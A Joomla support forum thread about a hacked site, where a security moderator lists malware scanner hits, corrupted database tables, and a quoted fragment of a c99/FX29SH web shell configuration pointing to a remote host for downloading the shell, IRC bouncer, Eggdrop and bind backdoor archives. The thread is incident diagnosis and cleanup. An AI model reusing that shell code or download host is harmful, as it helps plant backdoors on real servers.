The Joomla! Forum ™

@webdongle etc..

"You also need to remove every file, cron job, sub domains, directories, etc. from your domain."
"mmmmmmmm, me thought that was done in the first place"

Site was restored from site backups which are infected.

I've downloaded the backups I have from cPanel, unzipped them and scanned them with Norton anti-virus (I'm on a Mac). I did the same with the public_HTML folder. The backups had trojans,

Take a closer look at some of the posts. While it is possible that the server has another account hacked, it is likely originating from this account. There are several scripts here

an injector script and an uploader script:

HEX}base64.inject.unclassed.3 : ./media/system/cfg.php
{HEX}php.uploader.max.523 : ./media/system/upload.php

Evidence the hacker messed with or has attempted to mess with the database:

hableda1_jo151.jos_session
warning : Table is marked as crashed
warning : 1 client is using or hasn't closed the table properly
warning : Found 1128996 deleted space in delete link chain. Should be 1167464
error : Found 442 deleted rows in delete link chain. Should be 457

hableda1_jo151.jos_content
warning : 1 client is using or hasn't closed the table properly
status : OK
error : record delete-link-chain corrupted
error : Corrupt

Evidence that hacker has installed or linked to c99, and other scripts:

#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."c99_update.php";
$fx29sh_sourcesurl = $sh_mainurl."c99.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"),
"psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),

Evidence of IRC installed and active:

A few updates: I've downloaded and scanned my backup that was just generated and this virus was found in the homedir.tar and the hableda1.tar.gz (I scanned both the zipped and unzipped files): backdoor.IRC.bot.

Evidence the attempts to use the site for malware/spam/other purposes continue:

There is a lot of POST requests to the index page from the IP address xxx.xxx.xxx.xxx

These are the reasons I stated what I did as a plan of action.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

to which I agree completely and he should change host as well imho despite the host being very helpful. One cannot take the risk after all these events and the experience described to renew a Joomla site with the same host....No offense to the host as such but you simply cannot take the risk as habledash is expressing his own doubts!

@ habledash: No reason for me to take WP over Joomla...makes from a security point of view no difference....Bluehost I would investigate a little bit longer......Contact me via PMB to share some client experiences since I do not wish to get PhilD all over me with "wall of hosting shame" (Sorry Phil..could not resist a little joke.......don't take all too serious.....)

Leo

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---

Here are the results
http://www.google.co.uk/search?q=Blueho ... e=off&tbs=

_________________
http://weblinksonline.co.uk/joomla-faq.html

@ Webdongle
With all respect to your intentions and the facts please stay on topic....Your contribution adds to a "wall of shame" which does not belong in this thread.....

If you like to open a thread about experiences with whatever host feel free and it will be welcomed since these issues are important......However placing them in this thread is beyond topic imho

I restrained as you can see from my post...no need at all to do links to that particular host in thed thread (!)

Leo

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---

IMHO it is on topic an is not a 'Hall of shame' it is part of a diagnostic process. "Once you eliminate the impossible, whatever remains, no matter how improbable, must be the truth." Sir Arthur Conan Doyle.

The OP has eliminated everything else a search on his Host with the word 'Hacked' is that which remained. The search linked to, was the next step in the process of elimination. Pasting the link does not name and shame because it makes no conclusion about the Host. It merely shows a link to the results of such a search. Therefore it is part of the analytical process an not a hall of shame. And as such is very relevant to the thread.

_________________
http://weblinksonline.co.uk/joomla-faq.html

I think Webdongle was right to post the above link. I definitely is relevant in with regard to the OP making a decision to change hosts or not.
It looks pretty conclusive in my opinion what the next step should be.

_________________
http://www.netmagnetics.com

The Op had active on the domain a c99 script variant, an uploader script and an eggdrop script. The site had backups, both by the host and by the individual. However, these backups were all infected with the above scripts. The site has been cleaned, a much better host (mod_security etc.) has been selected to host the site, and the site is being monitored.

The database errors and other database issues were due to an excessively large sessions table. This has also been taken care of.

Edit: The host also was not BlueHost

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator